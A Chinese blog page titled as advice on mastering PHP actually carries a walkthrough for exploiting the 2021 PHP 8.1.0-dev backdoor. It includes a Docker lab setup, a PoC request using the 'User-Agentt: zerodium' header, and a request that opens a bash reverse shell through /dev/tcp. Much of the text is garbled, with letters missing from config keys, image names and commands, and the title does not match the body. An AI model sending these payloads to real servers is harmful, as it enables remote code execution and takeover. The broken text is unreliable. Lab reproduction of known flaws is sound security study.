当前位置:首页 > 每日看点 > 正文内容

怎样深入学习php,成为php高手?

卡卷网9个月前 (01-01)每日看点139

简介

PHPverion8.1.0-dev于2021年3月28与后门一起发布,但是后门很快被发现并删除。

#漏洞概述

PHPverion8.1.0-dev的PHP在上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

#影响版本

PHP8.1.0-dev

#环境搭建

新建docker-compose.yml

version:'2' servs: we: image:vulhu/php:8.1-ackdoor volumes: -./index.php:/var/www/html/index.php ports: -"8080:80"

启动环境

docker-composeup-d

#漏洞复现

#poc验证

在header头增加user-agentt字段,值为:zerodiumvar_dump(2*3);

GET//1.1 Host:192.168.81.223:8800 Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 user-agentt:zerodiumvar_dump(2*3); Connection:close

如果执行了这个表达式,说明存在漏洞

#执行命令反弹shell

GET//1.1 Host:192.168.81.223:8800 Praa:no-cache Cache-Control:no-cache Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate User-Agentt:zerodium("ash-c'execash-i>&/dev/tcp/ip/66660>&1'"); Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Connection:close

#事件分析与反思

代码中含有”zerodium”字符串,而zerodium是一个专门漏洞的.在此事件中,怀疑黑客攻陷了://git.php.net,以PHP作者的名义做了两次代码提交。

#参考文章

s://log.dn.net/zy15667076526/article/details/116447864

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/01/6068.html

分享给朋友:
返回列表

上一篇:怎么速成C#?

下一篇:浏览器点击网页有中病的风险么,不下载文件执行能保证安全么?

相关文章

是什么让你抛弃了 Windows 而转向 Mac?

是什么让你抛弃了 Windows 而转向 Mac?

别的不说,这玩意儿是真抗造啊,我这2012年买的MacBook Pro,依然在用……这台电脑我博士最后两年用来写代码(只写不运行,运行要上集群)和写论文,工作之后就变成生活和娱乐了,因为我一直用架子和外接键盘(颈椎不好)所以电脑看起来很新,...

你捡过最大的漏是什么?

你捡过最大的漏是什么?

买了套二手房,软磨硬泡便宜了1个w 结果就是一屋子狼藉 原业主说反正你们要重新装修 就不收拾了 等完了你们一起收拾掉吧 落了很多柜子 电器是啥的 今天打开卧室柜子一看…现在是去存钱的路上有朋友知道这样存钱银行会给发大米跟油吗...

2024,java开发,已经炸了吗?

炸的透透的了,坐标南京。一月底,一个好哥们,双休朝九晚六不加班18K,被裁。入职不到两年,算是工资和年终奖才赔了6.5W左右。上周五新公司入职,周六开始加班。现在每周134加班到晚上八点,好像薪资还不如以前高。三月上旬,另一个好哥们,薪资好...

有哪些是你用上了mac才知道的事?

用上了高端的Mac(已退货)才知道:原来文件夹里面的文件,你看到是8个,其实可能有12个。其中3个图标重叠在一起了,另外一个被拖动到屏幕外面了。用上了高端的Mac(已退货)才知道:原来鼠标灵敏度有问题是因为系统内置了鼠标加速度,只能用控制台...

怎样拥有一台最便宜的服务器?

怎样拥有一台最便宜的服务器?

内容提示:主打一个 DIY + 极限白嫖 =)某宝花10块买一个“随身WiFi”,刷入Ubuntu,用SSH远程连接,但是记得一定要把外壳撬掉然后粘个散热器(哪怕是白萝卜也彳亍),否则会过热详细去酷安社区搜“随身WiFi”=========...

国内AI大模型已近80个,哪个最有前途?

国内AI大模型已近80个,哪个最有前途?

题主说错了,不是80个,是168个!虽然“最有前途”不好说,但是我可以帮题主排除一些错误方向:开源大模型一定比闭源的有前途吗?参数量大的模型一定就比小模型有前途吗?榜单排名高的大模型一定更有前途吗?2024年3月更新,243个大模型中有哪几...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright © 2019-2024 www.kajuan.net 版权所有

Powered By Z-BlogPHP. Theme by TOYEAN.